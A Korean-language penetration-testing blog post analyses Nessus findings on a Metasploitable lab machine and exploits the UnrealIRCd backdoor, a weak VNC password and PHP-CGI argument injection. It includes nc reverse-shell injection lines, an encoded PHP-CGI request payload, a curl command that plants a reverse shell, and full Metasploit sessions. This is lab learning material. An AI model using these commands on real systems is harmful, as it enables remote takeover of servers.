모의해킹 및 보안
Metasploitable Vulnerability 스캔 결과 분석 및 Exploit
잉여토끼
2024. 10. 31. 12:18
Nessus를 이용하여 취약점 분석 실시 후 결과 분석
UnrealIRCd Backdoor Detection
1. Description
The remote IRC server is a version of UnrealIRCd with a backdoor that allows an attacker to execute arbitrary code on the affected host
IRC 서버에서 백도어가 포함된 UnrallRCd버전을 사용중이다. 백도어를 통해 호스트에서 임의의 코드를 실행 할 수 있다.
- IRC(Internet Relay Chat)
실시간 인터넷 채팅 프로토콜
채팅 및 대화 전송, 파일 공유가능.
2. Risk Information
CVSS v2.0
기본 점수: 10.0
시간 점수: 8.3
CVSS v2.0 벡터: CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:CCVSS v2.0
- AV
(Attack Vector: Network): 공격자가 네트워크를 통해 원격에서 접근할 수 있음을 의미 - AC
(Attack Complexity: Low): 공격을 수행하기 위한 복잡성이 낮음을 의미. 즉, 상대적으로 쉽게 공격할 수 있다. - Au
(Authentication: None): 공격자가 시스템에 접근하기 위해 인증이 필요하지 않음을 의미. - C
(Confidentiality Impact: Complete): 기밀성에 대한 영향이 완전하다는 뜻. 즉, 모든 정보가 노출될 수 있다. - I
(Integrity Impact: Complete): 무결성에 대한 영향이 완전하다는 뜻. 즉, 데이터가 완전히 변경될 수 있다. - A
(Availability Impact: Complete): 가용성에 대한 영향이 완전하다는 뜻. 즉, 시스템이나 서비스가 완전히 사용할 수 없게 될 수 있다..
시간 벡터: CVSS2#E:F/RL:OF/RC:C
- E
(Exploitability: Functional): 취약점이 실질적으로 이용 가능하다는 의미. - RL
(Remediation Level: Official Fix): 공식적인 수정이 제공된 상태를 나타낸다. - RC
(Report Confidence: Confirmed): 취약점의 존재가 확인되었다는 것을 의미.
CVE
NVD - CVE-2010-2075
CVE-2010-2075 Detail Modified This vulnerability has been modified since it was last analyzed by the NVD. It is awaiting reanalysis which may result in further changes to the information provided. Description UnrealIRCd 3.2.8.1, as distributed on certain m
nvd.nist.gov
3. Exploit
nc
1. 6667포트 IRC 접속 시도(shell 1)
┌──(root㉿kaya)-[~]
└─# nc 172.16.20.14 6667
Trying 172.16.20.14...
Connected to 172.16.20.14.
Escape character is '^]'.
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
close
:irc.Metasploitable.LAN 451 close :You have not registered
해당 포트로 접속하여 IRC 명령을 전송은 가능하나 등록된 사용자가 아니므로 IRC명령 사용이 금지된것을 확인.
https://github.com/chancej715/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution/blob/main/script.py
UnrealIRCd-3.2.8.1-Backdoor-Command-Execution/script.py at main · chancej715/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution
UnrealIRCd 3.2.8.1 backdoor command execution exploit in Python 3 (CVE-2010-2075). - chancej715/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution
github.com
https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/blob/master/exploit.py
UnrealIRCd-3.2.8.1-Backdoor/exploit.py at master · Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor
My backdoor script for a vulnerable version of UnrealIRCd - Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor
github.com
해당 취약점의 백도어는 AB;를 통해 실행됨을 확인.
2. nc를 통해 포트를 listen상태로 변경(shell 2)
┌──(root㉿kaya)-[/smb/python]
└─# nc -lvp 9898
listening on [any] 9898 ...
3. 명령어 삽입(shell 1)
┌──(root㉿kaya)-[/smb/python]
└─# nc 172.16.20.14 6667
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
AB; nc -e /bin/bash 172.16.20.10 9898
4. 리버스 쉘 획득(sehll 2)
┌──(root㉿kaya)-[/smb/python]
└─# nc -lvp 9898
listening on [any] 9898 ...
172.16.20.14: inverse host lookup failed: Unknown host
connect to [172.16.20.10] from (UNKNOWN) [172.16.20.14] 47031
echo "Hello"
Hello
Metasploit
1. msfconsole 실행
┌──(root㉿kaya)-[~]
└─# msfconsole
2. cve-2010-2075 검색
msf6 > search CVE-2010-2075
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/irc/unreal_ircd_3281_backdoor
3. UnrealIRCd backdoor 취약점 모듈 사용
msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) >
4. 해당 모듈의 payload 확인
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/adduser . normal No Add user with useradd
1 payload/cmd/unix/bind_perl . normal No Unix Command Shell, Bind TCP (via Perl)
2 payload/cmd/unix/bind_perl_ipv6 . normal No Unix Command Shell, Bind TCP (via perl) IPv6
3 payload/cmd/unix/bind_ruby . normal No Unix Command Shell, Bind TCP (via Ruby)
4 payload/cmd/unix/bind_ruby_ipv6 . normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
5 payload/cmd/unix/generic . normal No Unix Command, Generic Command Execution
6 payload/cmd/unix/reverse . normal No Unix Command Shell, Double Reverse TCP (telnet)
7 payload/cmd/unix/reverse_bash_telnet_ssl . normal No Unix Command Shell, Reverse TCP SSL (telnet)
8 payload/cmd/unix/reverse_perl . normal No Unix Command Shell, Reverse TCP (via Perl)
9 payload/cmd/unix/reverse_perl_ssl . normal No Unix Command Shell, Reverse TCP SSL (via perl)
10 payload/cmd/unix/reverse_ruby . normal No Unix Command Shell, Reverse TCP (via Ruby)
11 payload/cmd/unix/reverse_ruby_ssl . normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
12 payload/cmd/unix/reverse_ssl_double_telnet . normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
5. Reverce TCP Shell을 얻기 위해서 Double Reverce Shell을 사용
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload 6
payload => cmd/unix/reverse
6. 공격을 위한 옵션 확인
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[
,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.me
tasploit.com/docs/using-metasploit/basi
cs/using-metasploit.html
RPORT 6667 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be s
pecified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
7. Requierd옵션 및 임의 옵션 설정
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 172.16.20.14
rhosts => 172.16.20.10
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 172.16.20.10
lhost => 172.16.20.17
8. exploit
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP double handler on 172.16.20.10:4444
[*] 172.16.20.14:6667 - Connected to 172.16.20.14:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 172.16.20.14:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo GaqunWR6j0zcMtRu;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "GaqunWR6j0zcMtRu\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.20.10:4444 -> 172.16.20.14:57968) at 2024-10-30 10:47:03 +0900
echo "HI"
HI
VNC Server 'password' Password
1. Description
The VNC server running on the remote host is secured with a weak password. Nessus was able to login using VNC authentication and a password of 'password'. A remote, unauthenticated attacker could exploit this to take control of the system.
VNC서버의 비밀번호가 password로 설정되어있음.
2. Risk Information
CVSS v2.0
CVSS v2.0 기본 점수: 10.0
CVSS v2.0 벡터: CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
- AV
(Attack Vector: Network): 공격자가 네트워크를 통해 원격에서 접근할 수 있음을 의미 - AC
(Attack Complexity: Low): 공격을 수행하기 위한 복잡성이 낮음을 의미. 즉, 상대적으로 쉽게 공격할 수 있다. - Au
(Authentication: None): 공격자가 시스템에 접근하기 위해 인증이 필요하지 않음을 의미. - C
(Confidentiality Impact: Complete): 기밀성에 대한 영향이 완전하다는 뜻. 즉, 모든 정보가 노출될 수 있다. - I
(Integrity Impact: Complete): 무결성에 대한 영향이 완전하다는 뜻. 즉, 데이터가 완전히 변경될 수 있다. - A
(Availability Impact: Complete): 가용성에 대한 영향이 완전하다는 뜻. 즉, 시스템이나 서비스가 완전히 사용할 수 없게 될 수 있다..
3. Exploit?
vncviewer를 이용하여 접속
vncviewer 172.16.20.14::5900
Apache PHP-CGI Remote Code Execution
1. Description
The PHP installation on the remote web server contains a flaw that could allow a remote attacker to pass command-line arguments as part of a query string to the PHP-CGI program. This could be abused to execute arbitrary code, reveal PHP source code, cause a system crash, etc.
PHP-CGI 프로그램에 HTTP 쿼리를 통하여 시스템 명령을 실행하는 취약점
2. Resk Information
CVE
- CVE-2012-1823
- sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
- 5.3.12 and 5.4.x before 5.4.2에서 취약
- %3D(URL 인코딩된 =)가 포함된 쿼리 문자열이 있을 때, 이 문자열을 처리하면서 PHP가 특정 명령줄 옵션을 잘못 해석하여 원격 공격자가 임의의 코드를 실행할 수 있는 취약점.
- php_getopt 함수는 PHP에서 명령줄 인자를 파싱하는 데 사용되는 함수
- https://github.com/0xl0k1/CVE-2012-1823/tree/main
- CVE-2012-2311
- CVE-2012-1823에 대한 불완전한 수정으로 인해 존재. 위와 같은 취약점을 가짐.
- before 5.3.13 and 5.4.x before 5.4.3에서 존재
- CVE-2012-2335
- php-wrapper.fcgi does not properly handle command-line arguments, which allows remote attackers to bypass a protection mechanism in PHP 5.3.12 and 5.4.2 and execute arbitrary code by leveraging improper interaction between the PHP sapi/cgi/cgi_main.c component and a query string beginning with a +- sequence.
- php-wrapper.fcgi 스크립트에서 +-문자열을 처리하면서 임의의 코드 실행 가능
- wrapper는 시스템간에 상호작용을 중개하는 역할을 하는 스크립트이다.
- CVE-2012-2336
- CVE-2012-1823에 대한 불완전한 수정으로 인해 존재. 위와 같은 취약점을 가짐.
- 5.3.13 이전 버전과 5.4.3 이전의 5.4.x버전에서 존재
3. Output
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 172.16.20.14
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Content-Length: 115
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
<?php echo "Content-Type:text/html\r\n\r\n"; echo 'php_cgi_remote_code_execution-1729835760'; system('id'); die; ?>
위의 결과를 확인해보면 /cgi-bin/php의 Url 파라미터를 통해서 -d를 통해 옵션을 확인하거나 조정하는 것이 가능하다.
또한 Body Data를 통해 php 코드를 업로드하는것이 가능하며 system함수를 통해서 시스템에 명령을 전달 한 것을 볼 수 있다.
3. Exploit
crul을 이용
allow_url_includ, auto_prepend_file 옵션을 사용하여 php코드를 업로드 하여 공격
해당 옵션은 php.ini에서 확인이 가능하다.
- allow_url_include : 이 옵션이 1로 설정되면, PHP 스크립트에서 URL을 통해 파일을 include할 수 있다. 즉, 원격 서버의 파일을 include시킬 수 있게 되며, 보안상 위험할 수 있다.
- auto_prepend_file: 이 옵션은 PHP가 스크립트를 실행하기 전에 자동으로 특정 파일을 include하도록 지정한다.
php://input를 사용하면, HTTP 요청의 본문 내용을 읽을 수 있는 경로로 설정한다. 이는 보안에 취약할 수 있다.
curl -s -X POST "http://172.16.20.14/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" -d "<?php system('nc -e /bin/bash 172.16.20.10 9898'); die(); ?>" --connect-timeout 10
┌──(root㉿kaya)-[/smb/python]
└─# nc -lvp 9898
listening on [any] 9898 ...
172.16.20.14: inverse host lookup failed: Unknown host
connect to [172.16.20.10] from (UNKNOWN) [172.16.20.14] 36977
whoami
www-data
해당 과정을 통해서 www-data 권한의 리버스 쉘을 획득 할 수 있다.
Metasploit
1. msf 실행
2. cve 검색
msf6 auxiliary(scanner/ssl/ssl_version) > search CVE-2012-1823
Matching Modules
================
# Name Disclosure Date Rank Chec k Description
- ---- --------------- ---- ---- - -----------
0 exploit/multi/http/php_cgi_arg_injection 2012-05-03 excellent Yes PHP CGI Argument Injection
Interact with a module by name or index. For example info 0, use 0 or use exploi t/multi/http/php_cgi_arg_injection
3. 모듈 사용 설정
msf6 auxiliary(scanner/ssl/ssl_version) > use CVE-2012-1823 0
Matching Modules
================
# Name Disclosure Date Rank Chec k Description
- ---- --------------- ---- ---- - -----------
0 exploit/multi/http/php_cgi_arg_injection 2012-05-03 excellent Yes PHP CGI Argument Injection
Interact with a module by name or index. For example info 0, use 0 or use exploi t/multi/http/php_cgi_arg_injection
[*] Using exploit/multi/http/php_cgi_arg_injection
[*] Using configured payload php/meterpreter_reverse_tcp
3. payload 확인
msf6 exploit(multi/http/php_cgi_arg_injection) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_aws_instance_connect . normal No Unix SSH Shell, Bind Instance Connect (via AWS API)
1 payload/generic/custom . normal No Custom Payload
2 payload/generic/shell_bind_aws_ssm . normal No Command Shell, Bind SSM (via AWS API)
3 payload/generic/shell_bind_tcp . normal No Generic Command Shell, Bind TCP Inline
4 payload/generic/shell_reverse_tcp . normal No Generic Command Shell, Reverse TCP Inline
5 payload/generic/ssh/interact . normal No Interact with Established SSH Connection
6 payload/multi/meterpreter/reverse_http . normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
7 payload/multi/meterpreter/reverse_https . normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
8 payload/php/bind_perl . normal No PHP Command Shell, Bind TCP (via Perl)
9 payload/php/bind_perl_ipv6 . normal No PHP Command Shell, Bind TCP (via perl) IPv6
10 payload/php/bind_php . normal No PHP Command Shell, Bind TCP (via PHP)
11 payload/php/bind_php_ipv6 . normal No PHP Command Shell, Bind TCP (via php) IPv6
12 payload/php/download_exec . normal No PHP Executable Download and Execute
13 payload/php/exec . normal No PHP Execute Command
14 payload/php/meterpreter/bind_tcp . normal No PHP Meterpreter, Bind TCP Stager
15 payload/php/meterpreter/bind_tcp_ipv6 . normal No PHP Meterpreter, Bind TCP Stager IPv6
16 payload/php/meterpreter/bind_tcp_ipv6_uuid . normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
17 payload/php/meterpreter/bind_tcp_uuid . normal No PHP Meterpreter, Bind TCP Stager with UUID Support
18 payload/php/meterpreter/reverse_tcp . normal No PHP Meterpreter, PHP Reverse TCP Stager
19 payload/php/meterpreter/reverse_tcp_uuid . normal No PHP Meterpreter, PHP Reverse TCP Stager
20 payload/php/meterpreter_reverse_tcp . normal No PHP Meterpreter, Reverse TCP Inline
21 payload/php/reverse_perl . normal No PHP Command, Double Reverse TCP Connection (via Perl)
22 payload/php/reverse_php . normal No PHP Command Shell, Reverse TCP (via PHP)
4. payload 설정
리버스 쉘을 얻을 것이기에 22번 payload를 사용
msf6 exploit(multi/http/php_cgi_arg_injection) > set payload 22
payload => php/reverse_php
5. 옵션 확인 및 required 작성
msf6 exploit(multi/http/php_cgi_arg_injection) > show options
Module options (exploit/multi/http/php_cgi_arg_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
PLESK false yes Exploit Plesk
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.16.20.14 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI no The URI to request (must be a CGI-handled PHP script)
URIENCODING 0 yes Level of URI URIENCODING and padding (0 for minimum)
VHOST no HTTP server virtual host
Payload options (php/reverse_php):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.20.10 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
6. exploit
msf6 exploit(multi/http/php_cgi_arg_injection) > run
[*] Started reverse TCP handler on 172.16.20.10:4444
[*] Command shell session 2 opened (172.16.20.10:4444 -> 172.16.20.14:59971) at 2024-10-31 10:26:53 +0900
whoami
www-data
www-data 권한의 쉘을 얻은 것을 확인 가능.